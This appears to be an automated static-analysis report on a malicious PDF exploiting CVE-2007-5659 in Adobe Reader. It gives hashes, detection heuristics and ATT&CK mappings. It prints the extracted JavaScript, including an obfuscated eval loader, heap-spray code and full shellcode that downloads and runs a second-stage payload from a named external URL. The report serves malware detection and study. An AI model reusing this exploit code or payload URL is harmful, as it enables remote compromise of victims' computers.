Malicious PDF — malware analysis report

Static analysis result for SHA-256 7877cd58d0110131…

MALICIOUS

PDF

17.4 KB
MD5: 59f583b11506a5f0fb1211aea884b234 SHA-1: 95b146f45165495173655b8428a947fe00bc9604 SHA-256: 7877cd58d011013133478daefac6b26a4549162105ba1e4b3261b158b80f023b
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://plevok.info/page/gold.php/n00a106201r0007R43329fdcX7906b43bY0fbf44c8Z0100f080. The presence of multiple exploit-related heuristics and the embedded URL strongly indicate a malicious dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://plevok.info/page/gold.php/n00a106201r0007R43329fdcX7906b43bY0fbf44c8Z0100f080 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x434B 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
867c370d4a94c5d2646244666ea0abee087da290e650b70990774142af0eb3d8		 deobfuscated-js z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AAD 5274 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var I__X40_b = new Array();var FhU6U6n_Ho = 0;var L46_dE_53 = "";function vbIDF0E_6DF2k(iOV_4_S82cX6_hF, O480v_3){var e076G54B_N = O480v_3.toString();var UeYI__6i67_OG = "";for(var T_rr_M = 0; T_rr_M < e076G54B_N.length; T_rr_M++) {var sj55G_b0v = parseInt(e076G54B_N.substr(T_rr_M, 1));if (!isNaN(sj55G_b0v)) {sj55G_b0v = sj55G_b0v.toString(16);if (sj55G_b0v.length == 1) { sj55G_b0v = "0" + sj55G_b0v; }else if (sj55G_b0v.length != 2) { sj55G_b0v = "00"; }UeYI__6i67_OG = sj55G_b0v + UeYI__6i67_OG;if (UeYI__6i67_OG.length == 8) {break;}}}while(UeYI__6i67_OG.length < 8) { UeYI__6i67_OG = "0" + UeYI__6i67_OG; }var TkR4_i1_Qr = iOV_4_S82cX6_hF.toString(16);if (TkR4_i1_Qr.length == 1) { TkR4_i1_Qr = "0" + TkR4_i1_Qr; }else if (TkR4_i1_Qr.length != 2) { TkR4_i1_Qr = "00"; }UeYI__6i67_OG = "3" + TkR4_i1_Qr + "P" + UeYI__6i67_OG;return UeYI__6i67_OG;}function NeM_____o_w(PkbB8Wc8_EQis, BYyY06k_u07f0f1){var Ah__jE285SfOs = new Array("");var uT_34dC_J7aiL0 = PkbB8Wc8_EQis;var mp6__cqNR;if ((mp6__cqNR = PkbB8Wc8_EQis.lastIndexOf("%u00")) != -1) {if (mp6__cqNR + 6 == PkbB8Wc8_EQis.length) {Ah__jE285SfOs[0] = PkbB8Wc8_EQis.substr(mp6__cqNR + 4, 2);uT_34dC_J7aiL0 = PkbB8Wc8_EQis.substring(0, mp6__cqNR);}}mp6__cqNR = 1;for (T_rr_M = 0; T_rr_M < BYyY06k_u07f0f1.length; T_rr_M++) {var G_hk77q = BYyY06k_u07f0f1.charCodeAt(T_rr_M).toString(16);if (G_hk77q.length == 1) { G_hk77q = "0" + G_hk77q; }Ah__jE285SfOs[mp6__cqNR] = G_hk77q;mp6__cqNR++;}T_rr_M = Ah__jE285SfOs[0].length ? 0 : 1;Ah__jE285SfOs[mp6__cqNR] = "00";Ah__jE285SfOs[mp6__cqNR + 1] = "00";mp6__cqNR += 2;if ((Ah__jE285SfOs.length - T_rr_M) % 2) {Ah__jE285SfOs[mp6__cqNR] = "00";}while(T_rr_M < Ah__jE285SfOs.length) {uT_34dC_J7aiL0 += "%u" + Ah__jE285SfOs[T_rr_M + 1] + Ah__jE285SfOs[T_rr_M];T_rr_M += 2;}uT_34dC_J7aiL0 += "%u0000";return uT_34dC_J7aiL0;}function rD8_jg0(b5g8_1_l8m, e8_2aw_Awj_mI){while (b5g8_1_l8m.length*2<e8_2aw_Awj_mI) {b5g8_1_l8m += b5g8_1_l8m;}b5g8_1_l8m = b5g8_1_l8m.substring(0,e8_2aw_Awj_mI/2);return b5g8_1_l8m;}function lt__j_66m(h_3JoAypf, w_5_J066Qk, Xfn6tl2_6P835_a){var y_t_wuI = 0x0c0c0c0c;var b5g8_1_l8m = unescape(w_5_J066Qk);var BYyY06k_u07f0f1 = vbIDF0E_6DF2k(h_3JoAypf, Xfn6tl2_6P835_a);var OUG_C_Lc0a_2__f = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var PkbB8Wc8_EQis = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4570%u5169%u7168%u4c43%u0052%u7468%u7074%u2f3a%u702f%u656c%u6f76%u2e6b%u6e69%u6f66%u702f%u6761%u2f65%u6f67%u646c%u702e%u7068%u6e2f%u3030%u3161%u3630%u3032%u7231%u3030%u3730%u3452%u3333%u3932%u6466%u5863%u3937%u3630%u3462%u6233%u3059%u6266%u3466%u6334%u5a38%u3130%u3030%u3066%u3038";app.t1j__23h62_bQ4 = unescape(NeM_____o_w(PkbB8Wc8_EQis, BYyY06k_u07f0f1));var cWJe_B20JF_e = 0x400000;var aoQL4OP8U = OUG_C_Lc0a_2__f.length * 2;var e8_2aw_Awj_mI = cWJe_B20JF_e - (aoQL4OP8U+0x38);b5g8_1_l8m = rD8_jg0(b5g8_1_l8m, e8_2aw_Awj_mI);var c_6G_____B0y_7 = (y_t_wuI - 0x400000)/cWJe_B20JF_e;for (var L_kasahaF = 0; L_kasahaF < c_6G_____B0y_7; L_kasahaF++) {I__X40_b[L_kasahaF] = b5g8_1_l8m + OUG_C_Lc0a_2__f;}}function Ya_nhu_v(){var jU__p1d_o = "";for (T_rr_M = 
... (truncated)
deobfuscated.js
56aba845aca7702f7190d645ea9283137bb6460ff810f80d00ea25c8bb149d42		 deobfuscated-js PDF JavaScript deobfuscation pass 119736 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
7f45642630aj0f31481b3c7h40104c2k385ca6099d1d2f294gaf830625b1aeb7b998bj695h06c3751k0e0580b1521h0b91751735aa982a85381g9i336j5f1dbb9g353e8e5i1fba099d447jbb9a771h446f9i8242823b9e5fa1182k4j846h8b957b47b1378d862c0k9b30622g7h3f1a03522f551k3b9j7a828bb72d984e5f4bbf1j8535328g9j3h995gaf2cc07k6566aabeak8f2e254d689ca80g3i38b67ead251j073f61bgc3255ha744a08a145j6h77b9ak2b35975330952ib65c1j2b3hb9679f3d56641j4h5k084g0g0hbbb40e6905a49374116817c1801e22a69e863b7c15bj9i9kabb894939eb99i8i8021777i4b0ja52831aa066f6a443i9h102f7e55355h966a613fbg5k3f19746091893c95788kag48ak346ca0875e5h6a2f7e45475a3j138g27612f913abf1361b51k0d07254g55b7ba019j5a544ib61ga53e1388191j8504aj559g41742f6i8gc24i7h302j62b38h60239h947b6j211g9b2a62bc2gb03kad7kbjae19086a7a19bg0ic2934h056i985i35700096bd34ab3g436k88313d2b26287j809j0j394fa45e501a7c286k5bbcb1a31097237ea6a7bf557b290i907i6d6j7j9b11607j3k2cb822753h9e6b75022f37afb9a93j1g3i508b8i26372816bh5139ae20a35j8d67be437c306960a7203a964j7k571ib74759854h1ib29h1j0626014i363e012f214d8232bf071c0d30033211a67f9k183aa70d722c0h2k7k03329e996e8d08105jb944549g6c977e576db1755c9ca121bi4b0h9ib12fac03317ac109898hbk551499725c5656bfaa8h310b6e395768864c2713834c7c0h3i4556722i76194b3g5i09a2104cbb3j7d44bc5f055k7005129i995e225e07a58f30a0320e019515958ba8b56h4547219c33261e068h8f2k3g0g011i6i282920718f884aac2i6b25847fbi222j6a456076b8bk3b2e6a7h107d794jaf4dc3474a1hc05c0423ai3h9b239c7f1g01ae3c7f6kah150c0faf2147094e8883a47fa6206i6h6k440359668h748hb06b7f6d0a6bab8k658399bi9h6a136i9g4i6ead2f4f5kb28i99176f396584138830a19346ba6i6h595f652866505ea74j3a7f1b073d15313113949j4h5k41366d702d5d2f132b12127c9j10a84ab46k88bi730k0ja87h1e785cbgba95a814b182083j9ja3539g2b50b898257b3i1ha1637g7c2h33bg3j3e8i689jabc38d636hb88c92114b7k928j3eaf60a3919g333i5eak3h86b88h43b8568d7i4b381a137954a415bh1i7ibf430d1k14837j79bj3a09694i2c0j4jaj401kb39b6863341k60b2823h3ia0b4a58i412e4a368j9h3056029k5fb72b5091458i0a0h4d649146a79e405e6k392j972905a65j1e870k986b58354cae699f395i59bh2k693c4c3gba0j183c5i3703b9442b9bakbg761a1k91ag9c4b7j9b8875ba1dbjbgc38bb48k7780be3h9372248i084j9c1987852f459i9j318h5a35789f8k856ic38633c2497i9355bh6b3i4k6j588a0h3a6b577i8f9h1j7d7a6i313c43bc634g136i0j9b1h229227bh0g2h4g62881a2hb143303e1c4f914616b70f5ja60d6k61a76a872f759g8i574h1e3h47b483311e999g6a8g47197h3d87ah080h4fb2890bac163g60831f0299030g4a1i9ibg965951005i8233a21j20458j3062433435a89c0f284b3ia36g4gbh5kb98a50150a6i078jbb78c194bi947h2918b3ah8g7h8506075f5115b1be1j4i6h0987b2194e3g7e3eaj414c3j638b8j58194gc2104k3ab455099h4444ai499b3j69726i2728713k627h3a31464j983h1782863i0950065j4738181b034k7h2kbac2241e4i253d13bc779j124e020d6521a1276i1a4kaj0a3174bi115a92567e887k848i816bad4237a19a4h8414bj6aak017d0162810abca591015g1f8g8a5c6k771i905k00136929978kbg73561b4d5d5ab04d5d264a3e6h3h701i4f29ag357i2k6bbb7db172b62e52aja6b4884141800j927k5ca0018g9562176g5a80c36h44720387323c064f6j9j383g37b0066i2b1e2e859e7g671bc25g2h787eac0g29624h4k8f0jbj3g3g7494aj8ja62ka56h035i2g3b8j2h9k349738154eb49i0k10ae0hb37aa52818ag88253g1930039cakaba45ba3a0a75f00316h5h4a8095444d6d215ba5875h6da69b7a8j426da35698b9066j5kbk8hak0267bj4544a0933f8ga950269i5a8k503b1367495bbg5i3k7a57006d435a6335a69j0j391c3a4e58bh4e000i1bbc2b9bak2d147c1k91agb77ec19b8i8323754g939b6j1d3e1ibbc14eb1ad7cac1a65a2a02ba43g4g0433635f4025043h2d72329j858i6g4d3h0b929130698a8d7j3b7652997cab1k415f866h92b6ab37ag545d650g0aa61b552jba3g1j2f861e1b172d1d82a79ca62288567b4b07598d42208hb4687c6faa5bb67j7466a08d759e67466734799f2947229e8hb2171d9134678ga00d9i9144a9881a606169288d060aa752377c2jb25j4j517f1a749f1e26320j1h470850440b1c19185908a59k7b129e0bb57624209iabb4277107bjagahc3ai96ab57848198c10c6h7g4a268j25467a388h8c130g69adbd5h1g36646g6a5f2gb48i613h857fc24a3c8c695i7h75a3344e748970777534be73725f3g53bi6166akag22ae3g5db21f001d05505da5bi2d17264j1ja6419b3eb1af1a4j8947aa4f05505g417ib9ba7h72b90i55858f391ga5b8a27d49b39h5g99b03515399d66c1b1070c5k870f9k1000c3720h768c9g683e386ab230075b267a7dbe50135936ab910f1469487h8756417f059c2c12bi8f176i1i48be6ibb65abbh078h9i885189990j98794d2ibj1c7b74a05j7h2b39677527ad3827706e8b983ac335070j8i5k1f5k0c9d446k984h6g30457kaa22617c72999844274858b07b00bfae43b85h2b5j1h419j44212b9138013a281f1fb13g0fb6a799b11h99c37e229b
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.